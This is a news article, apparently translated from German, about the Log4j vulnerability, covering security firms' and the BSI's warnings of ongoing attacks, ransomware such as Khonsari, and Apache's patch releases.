Cyber ​​crime: the perfect Trojan horse

The waves of attack are rolling.

The attacks on millions of private and company computers are increasing every hour, and the relevant authorities have already started the alarm sirens.

The critical vulnerability in the popular Java library Log4j has been identified and analyzed;

the gap has also been closed for days with the first so-called patches;

however, with the logging library being so widespread on some three billion computers around the world, doors and gates are still open to data thieves.

Thiemo Heeg

Editor in business.

• Follow I follow

Stephan Finsterbusch

Editor in business.

• Follow I follow

According to the IT security analysts at Bitdefender, the origin of the attacks is concealed and can be traced back to the so-called Darknet with its criminal hackers.

However, the attacks are popping up in data centers in western industrialized countries such as Germany, the United States and the Netherlands.

This was the result of an analysis of Bitdefender Labs' honeypots and telemetry of several hundred million endpoints in the days after the vulnerability was discovered.

Is Germany a haven for hackers?

The German IT security authority BSI assumes that the vulnerability has been widely exploited. A real wave of attacks is expected. "It's as if all the front doors are suddenly open in a city with a high crime rate," says Martin Zugec, one of Bitdefender's technical directors. “That invites thieves.” Analyzes have already shown that more than a third of all globally registered attacks currently originated in Germany. Does that mean that Germany is a haven for hackers? No, says Zugec. Rather, the attackers operated from the Darknet. In this way they can remain anonymous, conceal their actions and lay false leads. With their programs they sneak up to the systems of their victims via virtual tunnels, penetrate them via the Log4j vulnerability, hijack them and wait for a good opportunity toTo make prey.

“We assume that there could be a real wave of attacks during the Christmas season,” says Zugec. And he's not alone in that. Authorities and security companies around the world are in alarm mode. On the side of the attacked, according to Bitdefender, every second network attacked is currently in the USA, followed by Canada and Great Britain (8 percent each). Germany is in fifth place with 6 percent.

Log4j is the perfect Trojan horse, explains Dominik Bredel from the IT service provider Kyndryl in a blog. Actually, it fulfills a rather unspectacular task with the registration of data. But since every system needs a register, Log4j is built into billions of computers. Its weak point is in fact like a master key to numerous IT systems. Many hackers are currently using automated software to check the Internet to see where such Log4j vulnerabilities are. Once discovered, they can place ransomware on the systems of their potential victims. This ransomware can initially remain passive - until the day it is activated. It is actually used like a "sleeper" that is activated at the push of a button, says Zugec from Bitdefender.Even if the digital gap closers that are now available are implemented in the affected IT system, the danger is far from over.

A vicious circle

The software company Microsoft expects state-sponsored attacks from different countries to use increasingly sophisticated techniques to exploit the vulnerability.

Bitdefender finds that the Khonsari blackmail trojan is already making its rounds.

The IT security service Check Point said at the weekend that it had repelled 3.7 million attempted attacks around the world with its security measures.

The developer of Log4j, the open source organization Apache, a foundation that usually works free of charge and makes software and program parts freely available, reacted quickly. The third major update has been released since the software vulnerability became known ten days ago. The programmer Christian Grobmeier, who worked on Log4j, wrote on Twitter on Saturday: “I know it's the weekend, but here is a new Log4j-2 version 2.17. Please install this software patch now, ”he advised, as these updates are good after all.

According to the Federal Office for Information Security (BSI), it is difficult to predict which products and services could be affected. The extent of the threat cannot be conclusively stated. Like the security companies Bitdefender, Kyndryl and Check Point, the BSI sees a threat on a broad front. Even by scanning your own systems, a possible infection of susceptible applications cannot be ruled out. The hackers don't just use technologies like crypto miners and botnets. They also use software that is used for security tests of IT systems. These programs are small and inconspicuous as they are executed in the computer's memory and they can be integrated into the systems via Log4j. Crypto miners abuse computer systems to "mine" massive amounts of data;Botnets are huge groups of infected and remotely controlled computers that are misused, for example, for overload attacks on known Internet sites (DDOS).

Cybercriminals can use these tools, which have been very popular for a long time, because the vulnerable Java library with Log4j enables them to smuggle their way into the IT systems of their victims remotely.

Even if no cases of abuse are known to date, the German cybersecurity authority BSI does not want to reset its “red warning level” to yellow for the time being.